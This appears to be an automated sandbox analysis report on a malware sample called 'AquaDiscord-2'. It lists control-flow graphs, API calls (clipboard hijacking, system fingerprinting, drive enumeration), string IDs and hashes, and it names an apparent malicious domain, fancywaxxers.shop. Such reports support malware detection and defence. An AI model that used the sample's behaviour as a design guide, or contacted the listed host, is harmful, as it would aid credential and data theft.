                                                                                          control_flow_graph 758 439b30-439b5f 759 439b60-439ba2 758->759 759->759 760 439ba4-439bb2 759->760 761 439bc0-439bd2 760->761 761->761 762 439bd4-439c12 761->762 763 439c20-439c32 762->763 763->763 764 439c34-439c50 763->764 766 439c52 764->766 767 439c5d-439c66 764->767 766->767 768 439c70-439c99 767->768 768->768 769 439c9b-439cf5 CoCreateInstance 768->769 770 439cfb-439d2f 769->770 771 43a1f9-43a21e call 4409b0 GetVolumeInformationW 769->771 773 439d30-439d44 770->773 776 43a220-43a224 771->776 777 43a228-43a22a 771->777 773->773 775 439d46-439d78 SysAllocString 773->775 780 43a1e5-43a1f5 SysFreeString 775->780 781 439d7e-439d98 CoSetProxyBlanket 775->781 776->777 779 43a23c-43a247 777->779 782 43a260-43a27f 779->782 783 43a249-43a250 779->783 780->771 785 43a1db-43a1e1 781->785 786 439d9e-439db3 781->786 784 43a280-43a2da 782->784 783->782 787 43a252-43a25e 783->787 784->784 788 43a2dc-43a2f5 784->788 785->780 789 439dc0-439e05 786->789 787->782 790 43a300-43a325 788->790 789->789 791 439e07-439e7f SysAllocString 789->791 790->790 792 43a327-43a343 790->792 793 439e80-439e94 791->793 794 43a3b0-43a3b7 792->794 795 43a345-43a351 792->795 793->793 796 439e96-439ebe SysAllocString 793->796 799 43a3f7-43a3ff 794->799 797 43a353-43a355 795->797 798 43a3c0-43a3c5 795->798 807 439ec4-439ee6 796->807 808 43a1bf-43a1d4 SysFreeString * 2 796->808 800 43a360-43a399 797->800 802 43a3a0-43a3ab 798->802 803 43a3c7-43a3ec 798->803 804 43a400-43a408 799->804 800->800 806 43a39b-43a39e 800->806 809 43a3ef-43a3f3 802->809 803->809 804->804 805 43a40a-43a40c 804->805 810 43a412-43a422 call 408150 805->810 811 43a230-43a236 805->811 806->802 806->803 816 43a1b5-43a1bb 807->816 817 439eec-439eef 807->817 808->785 809->799 810->811 811->779 814 43a427-43a42e 811->814 816->808 817->816 818 439ef5-439efa 817->818 818->816 819 439f00-439f48 VariantInit 818->819 820 439f50-439f64 819->820 820->820 821 439f66-439f70 820->821 822 439f74-439f76 821->822 823 43a1a4-43a1b1 VariantClear 822->823 824 439f7c-439f82 822->824 823->816 824->823 825 439f88-439f92 824->825 826 439fd5 825->826 827 439f94-439f99 825->827 829 439fd7-439ff1 call 407fc0 826->829 828 439fac-439fb0 827->828 831 439fb2-439fbb 828->831 832 439fa0 828->832 837 43a152-43a163 829->837 838 439ff7-43a001 829->838 835 439fc2-439fc6 831->835 836 439fbd-439fc0 831->836 834 439fa1-439faa 832->834 834->828 834->829 835->834 839 439fc8-439fd3 835->839 836->834 841 43a165 837->841 842 43a16a-43a176 837->842 838->837 840 43a007-43a00f 838->840 839->834 843 43a010-43a01e 840->843 841->842 844 43a178 842->844 845 43a17d-43a1a0 call 407ff0 call 407fd0 842->845 846 43a040-43a046 843->846 847 43a020-43a02d 843->847 844->845 845->823 850 43a074-43a080 846->850 851 43a048-43a04b 846->851 849 43a0f0-43a0f4 847->849 857 43a0f6-43a0fc 849->857 854 43a086-43a089 850->854 855 43a108-43a110 850->855 851->850 853 43a04d-43a072 851->853 853->849 854->855 860 43a08b-43a0ef 854->860 858 43a112-43a118 855->858 859 43a11a-43a11f 855->859 857->837 862 43a0fe-43a100 857->862 858->857 863 43a121-43a148 859->863 864 43a14a-43a150 859->864 860->849 862->843 865 43a106 862->865 863->849 864->849 865->837
                                                                                          APIs
                                                                                          • CoCreateInstance.OLE32(0044468C,00000000,00000001,0044467C,00000000), ref: 00439CED
                                                                                          • SysAllocString.OLEAUT32(CCA0CE8C), ref: 00439D47
                                                                                          • CoSetProxyBlanket.COMBASE(?,0000000A,00000000,00000000,00000003,00000003,00000000,00000000), ref: 00439D90
                                                                                          • SysAllocString.OLEAUT32(82DC8CE4), ref: 00439E0C
                                                                                          • SysAllocString.OLEAUT32(82DC8CE4), ref: 00439E97
                                                                                          • VariantInit.OLEAUT32(oTUJ), ref: 00439F05
                                                                                          • GetVolumeInformationW.KERNELBASE(?,00000000,00000000,CCA0CE8C,00000000,00000000,00000000,00000000), ref: 0043A21A
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: AllocString$BlanketCreateInformationInitInstanceProxyVariantVolume
                                                                                          • String ID: !B$C$oTUJ
                                                                                          • API String ID: 1810270423-3346123761
                                                                                          • Opcode ID: 92c28b2f1e1ce454a1989aec24678e01c31857c879c3496e424f8912745cb02b
                                                                                          • Instruction ID: 4797e4197787e1ccd0c2251949579dafbeb3e9d5dd3206026abedc5e4ab30956
                                                                                          • Opcode Fuzzy Hash: 92c28b2f1e1ce454a1989aec24678e01c31857c879c3496e424f8912745cb02b
                                                                                          • Instruction Fuzzy Hash: 4E32FE71A483518BD714CF24C88176BBBE1EBCA314F14992EE8D59B391D378D806CB9B

                                                                                          Control-flow Graph

                                                                                          APIs
                                                                                          • Sleep.KERNELBASE(00000001), ref: 05141032
                                                                                          • OpenClipboard.USER32(00000000), ref: 0514103C
                                                                                          • GetClipboardData.USER32(0000000D), ref: 0514104C
                                                                                          • GlobalLock.KERNEL32(00000000), ref: 0514105D
                                                                                          • GlobalAlloc.KERNEL32(00000002,-00000004), ref: 05141090
                                                                                          • GlobalLock.KERNEL32 ref: 051410A0
                                                                                          • GlobalUnlock.KERNEL32 ref: 051410C1
                                                                                          • EmptyClipboard.USER32 ref: 051410CB
                                                                                          • SetClipboardData.USER32(0000000D), ref: 051410D6
                                                                                          • GlobalFree.KERNEL32 ref: 051410E3
                                                                                          • GlobalUnlock.KERNEL32(?), ref: 051410ED
                                                                                          • CloseClipboard.USER32 ref: 051410F3
                                                                                          • GetClipboardSequenceNumber.USER32 ref: 051410F9
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2910327560.0000000005141000.00000020.00000800.00020000.00000000.sdmp, Offset: 05140000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2910313996.0000000005140000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                          • Associated: 00000002.00000002.2910346719.0000000005142000.00000002.00000800.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_5140000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: ClipboardGlobal$DataLockUnlock$AllocCloseEmptyFreeNumberOpenSequenceSleep
                                                                                          • String ID:
                                                                                          • API String ID: 1416286485-0
                                                                                          • Opcode ID: 0a0cb422625d0ea18f9246ca51bb2cdf7fb3927eab9c5c5d665d0f30ba870190
                                                                                          • Instruction ID: 9f9ebd04da3564eb1df95700566734b50bcabec6f0bd32b42642096c5e886584
                                                                                          • Opcode Fuzzy Hash: 0a0cb422625d0ea18f9246ca51bb2cdf7fb3927eab9c5c5d665d0f30ba870190
                                                                                          • Instruction Fuzzy Hash: 9821627D654250ABE7202BB1AC0AF7A7BB8FF08A55F052438F955D7191EB7188C0CEA1

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 888 40ffd6-40ffee 889 40fff0-40fff3 888->889 890 410032-410069 call 401860 889->890 891 40fff5-410030 889->891 894 41006b-41006e 890->894 891->889 895 410110-410144 call 401860 894->895 896 410074-41010b 894->896 899 410146-410187 call 413870 895->899 900 410148 895->900 896->894 908 410189 899->908 909 41018b-4101d3 call 407fc0 call 40a620 899->909 902 410c74 900->902 903 4118e9 902->903 906 4118eb-411906 call 401f20 903->906 914 40e4e6-411917 906->914 915 40e4ed-40e515 call 401f30 906->915 908->909 921 4101d5-4101d8 909->921 924 40e517-40e51a 915->924 922 410266-410281 call 401860 921->922 923 4101de-410261 921->923 931 410283-4102a4 call 413870 922->931 932 4102cc-4102fd call 413870 922->932 923->921 926 40e533-40e56c call 401e20 924->926 927 40e51c-40e531 924->927 933 40e570 926->933 934 40e56e-40e591 926->934 927->924 941 4102a6 931->941 942 4102a8-4102c7 call 407fc0 call 40a620 931->942 943 410301-4103a4 call 407fc0 call 40a620 RtlExpandEnvironmentStrings 932->943 944 4102ff 932->944 933->906 940 40e593-40e596 934->940 946 40e5c7-40e61c call 401960 940->946 947 40e598-40e5c5 940->947 941->942 942->932 957 4103a6-4103a9 943->957 944->943 946->903 956 40e622 946->956 947->940 956->903 958 4103f2-410406 957->958 959 4103ab-4103f0 957->959 960 410408-410419 call 407fd0 958->960 961 41041e-410437 958->961 959->957 969 410c72 960->969 963 410439 961->963 964 41043b-41049d call 407fc0 961->964 963->964 971 4104c6-4104f1 call 407fd0 964->971 972 41049f-4104c1 call 407fd0 * 2 964->972 969->902 982 4104f3-4104f6 971->982 987 410c70 972->987 983 410522-41054b call 401860 982->983 984 4104f8-410520 982->984 989 41054d 983->989 990 41054f-410570 call 413870 983->990 984->982 987->969 991 41059d-4105b5 989->991 995 410572 990->995 996 410574-410598 call 407fc0 call 40a620 990->996 994 4105b7-4105ba 991->994 997 4105c0-410644 994->997 998 410649-410691 call 401b70 994->998 995->996 996->991 997->994 1003 410694-410697 998->1003 1005 4106f3-410714 call 401a70 1003->1005 1006 410699-4106f1 1003->1006 1009 41071a-410761 call 401f20 1005->1009 1010 410b1c-410bae call 408b50 call 414930 1005->1010 1006->1003 1016 410763 1009->1016 1017 410765-410785 call 407fc0 1009->1017 1018 410bb3-410bc9 call 4096b0 1010->1018 1016->1017 1023 4107b0-4107b2 1017->1023 1024 410787-410790 1017->1024 1027 410c18-410c44 call 407fd0 * 2 1018->1027 1028 410bcb-410bdf 1018->1028 1026 4107b4-4107bd 1023->1026 1025 410792-41079e call 4139b0 1024->1025 1041 4107a0-4107ae 1025->1041 1031 4107cb-41080b call 401f30 1026->1031 1032 4107bf-4107c6 1026->1032 1055 410c46-410c49 call 407fd0 1027->1055 1056 410c4e-410c58 1027->1056 1033 410be1-410bea 1028->1033 1034 410c07-410c16 call 407fd0 1028->1034 1046 41080d-410810 1031->1046 1032->1010 1044 410bec-410bfc call 413b60 1033->1044 1034->1027 1041->1023 1054 410bfe-410c05 1044->1054 1049 410882-4108c9 call 401860 1046->1049 1050 410812-410880 1046->1050 1061 4108cb-4108ce 1049->1061 1050->1046 1054->1034 1055->1056 1059 410c62-410c6e call 408c30 1056->1059 1060 410c5a-410c5d call 407fd0 1056->1060 1059->987 1060->1059 1062 4108d0-4108eb 1061->1062 1063 4108ed-41093c call 401860 1061->1063 1062->1061 1069 41093e-410941 1063->1069 1070 410947-4109ea 1069->1070 1071 4109ef-410a41 call 401b70 1069->1071 1070->1069 1074 410a43-410a46 1071->1074 1075 410a48-410a98 1074->1075 1076 410a9a-410b17 call 401b70 call 4139d0 1074->1076 1075->1074 1076->1026
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: !$0$:$=$H$Q$R$Z$|
                                                                                          • API String ID: 0-2647137366
                                                                                          • Opcode ID: f791f164d742791169fef67f2675f96a806319c50ed3faa86751d73b7e79b0e1
                                                                                          • Instruction ID: b1c587c69972fe86ad369410b5a1af1c9ee2814cf2c8545fb68a45fe4272fdb3
                                                                                          • Opcode Fuzzy Hash: f791f164d742791169fef67f2675f96a806319c50ed3faa86751d73b7e79b0e1
                                                                                          • Instruction Fuzzy Hash: 3E72A272A0C7808BD324DB39C89139FBBD2ABD5314F198A3EE5D9D73C1D67889418B46
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: Ktrr$NCGA$^jk[$b,B$fancywaxxers.shop$gPRf$~~
                                                                                          • API String ID: 0-3155797656
                                                                                          • Opcode ID: 9732420e11d04317ffb174467f05412886ab3ecec205061c9218f6f2eccd2ce3
                                                                                          • Instruction ID: 94f55b53ddaffc0f10203bef1cd3c4aa6590c85254d220e29af91e2d34122216
                                                                                          • Opcode Fuzzy Hash: 9732420e11d04317ffb174467f05412886ab3ecec205061c9218f6f2eccd2ce3
                                                                                          • Instruction Fuzzy Hash: EFB23175608351CBD314CF29D88126BBBE2FF86310F48897DE9D58B391DB789906CB86

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1453 434460-43454c GetSystemMetrics * 2 1459 434553-434851 1453->1459
                                                                                          APIs
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem
                                                                                          • String ID: $EKC$`LC$lKC$rHC
                                                                                          • API String ID: 4116985748-523529498
                                                                                          • Opcode ID: f14ede883a64fc22c4e803d8ae2d7de582ceef30be9ed441c710ed16ffbb3712
                                                                                          • Instruction ID: ed053f1949e861fbaa0d96d56bbd1847bf0cf4b0b235e97d76566608e50df858
                                                                                          • Opcode Fuzzy Hash: f14ede883a64fc22c4e803d8ae2d7de582ceef30be9ed441c710ed16ffbb3712
                                                                                          • Instruction Fuzzy Hash: 16912FB45093808FE760DF14D58978BBBF1BBC5708F10892EE5988B351DBB99848DF4A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1466 40d75b-40d78f call 434460 call 4096b0 CoUninitialize 1471 40d790-40d7ae 1466->1471 1471->1471 1472 40d7b0-40d7cf 1471->1472 1473 40d7d0-40d7f5 1472->1473 1473->1473 1474 40d7f7-40d85f 1473->1474 1475 40d860-40d882 1474->1475 1475->1475 1476 40d884-40d895 1475->1476 1477 40d897-40d8a5 1476->1477 1478 40d8bb-40d8ca 1476->1478 1479 40d8b0-40d8b9 1477->1479 1480 40d8db-40d8e8 1478->1480 1481 40d8cc-40d8cf 1478->1481 1479->1478 1479->1479 1483 40d8ea-40d8f1 1480->1483 1484 40d90b-40d913 1480->1484 1482 40d8d0-40d8d9 1481->1482 1482->1480 1482->1482 1485 40d900-40d909 1483->1485 1486 40d915-40d916 1484->1486 1487 40d92b-40d935 1484->1487 1485->1484 1485->1485 1488 40d920-40d929 1486->1488 1489 40d937-40d93b 1487->1489 1490 40d94b-40d957 1487->1490 1488->1487 1488->1488 1491 40d940-40d949 1489->1491 1492 40d971-40da8f 1490->1492 1493 40d959-40d95b 1490->1493 1491->1490 1491->1491 1495 40da90-40dabe 1492->1495 1494 40d960-40d96d 1493->1494 1494->1494 1496 40d96f 1494->1496 1495->1495 1497 40dac0-40dadf 1495->1497 1496->1492 1498 40dae0-40db06 1497->1498 1498->1498 1499 40db08-40db49 call 40b620 1498->1499
                                                                                          APIs
                                                                                            • Part of subcall function 00434460: GetSystemMetrics.USER32 ref: 004344A9
                                                                                            • Part of subcall function 00434460: GetSystemMetrics.USER32 ref: 004344B9
                                                                                          • CoUninitialize.COMBASE ref: 0040D770
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: MetricsSystem$Uninitialize
                                                                                          • String ID: ;8$fancywaxxers.shop$hSnY$khZp
                                                                                          • API String ID: 1128523136-1874093197
                                                                                          • Opcode ID: 3cd5eabe0aded617b4ba2f9d7c918d7c30aa78df103585c26a0bd7b421f5f68d
                                                                                          • Instruction ID: b74903e71e8f716a9a88ed692504ce4700a07b82aaccec82dcfcfa98f5602128
                                                                                          • Opcode Fuzzy Hash: 3cd5eabe0aded617b4ba2f9d7c918d7c30aa78df103585c26a0bd7b421f5f68d
                                                                                          • Instruction Fuzzy Hash: E891DFB090C3D18AD3358F2580907EBFBE1ABD7304F18496DD4DA6B392C7788509CB9A

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1502 4087b0-4087c1 call 43e510 1505 4087c7-4087ce call 4363b0 1502->1505 1506 408a4f-408a51 ExitProcess 1502->1506 1509 4087d4-4087f8 GetCurrentProcessId GetCurrentThreadId 1505->1509 1510 408a4a call 43ee20 1505->1510 1512 4087fa-4087fc 1509->1512 1513 4087fe-408922 SHGetSpecialFolderPathW 1509->1513 1510->1506 1512->1513 1514 408930-40894f 1513->1514 1514->1514 1515 408951-40897f call 43cfd0 1514->1515 1518 408980-40899c 1515->1518 1519 4089b6-4089c9 GetForegroundWindow 1518->1519 1520 40899e-4089b4 1518->1520 1521 408a14-408a2c call 409bb0 1519->1521 1522 4089cb-4089ef 1519->1522 1520->1518 1527 408a38-408a3f 1521->1527 1528 408a2e call 40c880 1521->1528 1523 4089f1-4089f3 1522->1523 1524 4089f5-408a12 1522->1524 1523->1524 1524->1521 1527->1510 1530 408a41-408a47 call 407fd0 1527->1530 1532 408a33 call 40b5f0 1528->1532 1530->1510 1532->1527
                                                                                          APIs
                                                                                          • GetCurrentProcessId.KERNEL32 ref: 004087D4
                                                                                          • GetCurrentThreadId.KERNEL32 ref: 004087DE
                                                                                          • SHGetSpecialFolderPathW.SHELL32(00000000,?,00000010,00000000), ref: 004088FC
                                                                                          • GetForegroundWindow.USER32 ref: 004089C1
                                                                                          • ExitProcess.KERNEL32 ref: 00408A51
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: CurrentProcess$ExitFolderForegroundPathSpecialThreadWindow
                                                                                          • String ID:
                                                                                          • API String ID: 4063528623-0
                                                                                          • Opcode ID: 54462c685be16421f6194d86c174339d0282144dba7c7d0f03c2668cceba3d88
                                                                                          • Instruction ID: 9a300c1681b891008e909fe3257d388318bfb44b29180f89294f6db9c3555df2
                                                                                          • Opcode Fuzzy Hash: 54462c685be16421f6194d86c174339d0282144dba7c7d0f03c2668cceba3d88
                                                                                          • Instruction Fuzzy Hash: AB613A72B443044FC318EF69CD5536AB6D69BC9310F09C53EA8C4AB3E5EE789C058A99

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1535 422f70-422fc7 1536 422fd0-42300b 1535->1536 1536->1536 1537 42300d-423059 RtlExpandEnvironmentStrings 1536->1537 1538 423060-4230b7 1537->1538 1538->1538 1539 4230b9-4230c4 1538->1539 1540 423392-42339b 1539->1540 1541 423382-423389 1539->1541 1542 423111-423117 call 407fd0 1539->1542 1543 423376-42337b 1539->1543 1544 423127 1539->1544 1545 42311a-423126 1539->1545 1546 4230cb-4230d1 1539->1546 1547 423109 1539->1547 1548 423269-423272 1539->1548 1549 42312d-423136 1539->1549 1557 4233a4 1540->1557 1558 42339d-4233a2 1540->1558 1541->1540 1542->1545 1543->1540 1543->1541 1551 423530-4235db 1543->1551 1552 423640-423662 1543->1552 1553 42352a 1543->1553 1554 423518-423522 1543->1554 1544->1549 1559 4230d3-4230d8 1546->1559 1560 4230da 1546->1560 1547->1542 1561 423280 1548->1561 1562 423274-423279 1548->1562 1555 423138-42313d 1549->1555 1556 42313f 1549->1556 1569 4235e0-423612 1551->1569 1564 423670-42369e 1552->1564 1553->1551 1554->1553 1565 423146-423181 call 407fc0 1555->1565 1556->1565 1566 4233ab-423452 call 407fc0 1557->1566 1558->1566 1567 4230dd-423102 call 407fc0 RtlExpandEnvironmentStrings 1559->1567 1560->1567 1568 423287-4232c9 call 407fc0 1561->1568 1562->1568 1564->1564 1570 4236a0-423724 1564->1570 1584 423190-4231dc 1565->1584 1585 423460-423490 1566->1585 1567->1540 1567->1541 1567->1542 1567->1543 1567->1544 1567->1545 1567->1547 1567->1548 1567->1549 1586 4232d0-42331b 1568->1586 1569->1569 1575 423614-423631 call 420dd0 1569->1575 1576 423730-423756 1570->1576 1595 42363a 1575->1595 1576->1576 1583 423758-42377d call 4209b0 1576->1583 1614 423786 1583->1614 1584->1584 1588 4231de-4231e9 1584->1588 1585->1585 1589 423492-42349d 1585->1589 1586->1586 1590 42331d-42332c 1586->1590 1597 423201-42320e 1588->1597 1598 4231eb-4231ee 1588->1598 1591 4234c1-4234ce 1589->1591 1592 42349f-4234a6 1589->1592 1593 423342-42334f 1590->1593 1594 42332e 1590->1594 1606 4234d0-4234d4 1591->1606 1607 4234f1-423511 GetLogicalDrives call 441f50 1591->1607 1605 4234b0-4234bf 1592->1605 1600 423250-42325b call 441f50 1593->1600 1601 423355-423359 1593->1601 1599 423330-423340 1594->1599 1595->1552 1603 423210-423214 1597->1603 1604 423231-423244 call 441f50 1597->1604 1602 4231f0-4231ff 1598->1602 1599->1593 1599->1599 1617 423260 1600->1617 1610 423360-42336f 1601->1610 1602->1597 1602->1602 1608 423220-42322f 1603->1608 1604->1548 1605->1591 1605->1605 1611 4234e0-4234ef 1606->1611 1607->1552 1607->1553 1607->1554 1607->1595 1607->1614 1619 4237a4-4237aa call 407fd0 1607->1619 1620 42379e 1607->1620 1621 42378c-423795 call 407fd0 1607->1621 1622 4237ad-4237b3 call 407fd0 1607->1622 1608->1604 1608->1608 1610->1610 1615 423371 1610->1615 1611->1607 1611->1611 1614->1621 1615->1600 1617->1548 1619->1622 1620->1619 1621->1620 1629 4237b6 1622->1629 1629->1629
                                                                                          APIs
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,00000000,?), ref: 00423041
                                                                                          • RtlExpandEnvironmentStrings.NTDLL(00000000,?,0000000E,00000000,?,?), ref: 004230F4
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: EnvironmentExpandStrings
                                                                                          • String ID: ~~
                                                                                          • API String ID: 237503144-3574127172
                                                                                          • Opcode ID: c4c472e46fa3863ed812600143a1e91a35e575045751546efa44a3f4b90bf9b0
                                                                                          • Instruction ID: be22e521949e80bfa6a031671857a5ba9b29f52d2d452f9ff4a016b8a06bfdda
                                                                                          • Opcode Fuzzy Hash: c4c472e46fa3863ed812600143a1e91a35e575045751546efa44a3f4b90bf9b0
                                                                                          • Instruction Fuzzy Hash: EB122FB6A083608BD310CF59E88021BBBF1FFD5314F14896DE9D59B350DB789A068B86
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID:
                                                                                          • String ID: ~~
                                                                                          • API String ID: 0-3574127172
                                                                                          • Opcode ID: 47dd2df0fa5dd291b6f97a9fff72f1a02d2570d06c7a8b667f8be9833521f2e5
                                                                                          • Instruction ID: 7dbfdddcb27124cc5a5c4f8af779dcc8181431db2658f0e649bf51fcd82c8dbe
                                                                                          • Opcode Fuzzy Hash: 47dd2df0fa5dd291b6f97a9fff72f1a02d2570d06c7a8b667f8be9833521f2e5
                                                                                          • Instruction Fuzzy Hash: B7320D75A18311CBD314CF28E84122BB7F2FF85315F08896DE9858B3A5DB78D946CB86

                                                                                          Control-flow Graph

                                                                                          • Executed
                                                                                          • Not Executed
                                                                                          control_flow_graph 1812 42da21-42da46 1813 42da50-42da92 1812->1813 1813->1813 1814 42da94-42daa1 1813->1814 1815 42daa3-42daa9 1814->1815 1816 42dabb-42dac7 1814->1816 1817 42dab0-42dab9 1815->1817 1818 42dae1-42db23 call 4409b0 1816->1818 1819 42dac9-42dacb 1816->1819 1817->1816 1817->1817 1825 42db30-42db7b 1818->1825 1821 42dad0-42dadd 1819->1821 1821->1821 1822 42dadf 1821->1822 1822->1818 1825->1825 1826 42db7d-42dbc2 call 41d7a0 1825->1826 1829 42dbd0-42dc2b 1826->1829 1829->1829 1830 42dc2d-42dc34 1829->1830 1831 42dc36-42dc41 1830->1831 1832 42dc5d-42dc60 1830->1832 1834 42dc50-42dc59 1831->1834 1833 42dc64-42dc6c 1832->1833 1835 42dc7b-42dc85 1833->1835 1836 42dc6e-42dc6f 1833->1836 1834->1834 1837 42dc5b 1834->1837 1839 42dc87-42dc8b 1835->1839 1840 42dc9b-42dce6 1835->1840 1838 42dc70-42dc79 1836->1838 1837->1833 1838->1835 1838->1838 1841 42dc90-42dc99 1839->1841 1842 42dcf0-42dd56 1840->1842 1841->1840 1841->1841 1842->1842 1843 42dd58-42dd5f 1842->1843 1844 42dd61-42dd6f 1843->1844 1845 42dd7d-42dd81 1843->1845 1846 42dd70-42dd79 1844->1846 1847 42dd84-42dd8e 1845->1847 1846->1846 1848 42dd7b 1846->1848 1849 42dd90-42dd94 1847->1849 1850 42ddab-42de59 1847->1850 1848->1847 1852 42dda0-42dda9 1849->1852 1851 42de60-42dea2 1850->1851 1851->1851 1853 42dea4-42deb1 1851->1853 1852->1850 1852->1852 1854 42deb3-42deb5 1853->1854 1855 42decb-42ded7 1853->1855 1856 42dec0-42dec9 1854->1856 1857 42def1-42df3b call 4409b0 GetPhysicallyInstalledSystemMemory 1855->1857 1858 42ded9-42dedb 1855->1858 1856->1855 1856->1856 1863 42df40-42df8b 1857->1863 1859 42dee0-42deed 1858->1859 1859->1859 1861 42deef 1859->1861 1861->1857 1863->1863 1864 42df8d-42dfcf call 41d7a0 1863->1864 1867 42dfd0-42e02b 1864->1867 1867->1867 1868 42e02d-42e034 1867->1868 1869 42e050 1868->1869 1870 42e036-42e03f 1868->1870 1872 42e053-42e05f 1869->1872 1871 42e040-42e049 1870->1871 1871->1871 1873 42e04b 1871->1873 1874 42e061-42e062 1872->1874 1875 42e07b-42e085 1872->1875 1873->1872 1876 42e070-42e079 1874->1876 1877 42e087-42e08b 1875->1877 1878 42e09b-42e0e6 1875->1878 1876->1875 1876->1876 1879 42e090-42e099 1877->1879 1880 42e0f0-42e156 1878->1880 1879->1878 1879->1879 1880->1880 1881 42e158-42e15f 1880->1881 1882 42e180-42e187 1881->1882 1883 42e161-42e16c 1881->1883 1885 42e18b-42e195 1882->1885 1884 42e170-42e179 1883->1884 1884->1884 1886 42e17b 1884->1886 1887 42e197 1885->1887 1888 42e1ab-42e235 1885->1888 1886->1885 1889 42e1a0-42e1a9 1887->1889 1889->1888 1889->1889
                                                                                          APIs
                                                                                          • GetPhysicallyInstalledSystemMemory.KERNELBASE(?), ref: 0042DF1F
                                                                                          Strings
                                                                                          Memory Dump Source
                                                                                          • Source File: 00000002.00000002.2909459178.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                          • Associated: 00000002.00000002.2909459178.0000000000454000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                          Joe Sandbox IDA Plugin
                                                                                          • Snapshot File: hcaresult_2_2_400000_AquaDiscord-2.jbxd
                                                                                          Similarity
                                                                                          • API ID: InstalledMemoryPhysicallySystem
                                                                                          • String ID: CV,^$gue3
                                                                                          • API String ID: 3960555810-3407280499
                                                                                          • Opcode ID: f3ebf605be4dd65c58c762228fb8a13e8e5602d94894f8a1cf6226854c9fd278
                                                                                          • Instruction ID: 98bee3bd0e59378419626ccd196ac9573ee343c68945e602011319479aa8ab1c
                                                                                          • Opcode Fuzzy Hash: f3ebf605be4dd65c58c762228fb8a13e8e5602d94894f8a1cf6226854c9fd278
                                                                                          • Instruction Fuzzy Hash: 5C221971A0C7A18BD325CF29D45036BBFD2AFD6314F1889AED4D99B341C6798806CB86
                                                                                          Strings
                                                                                          Memory Dump Source
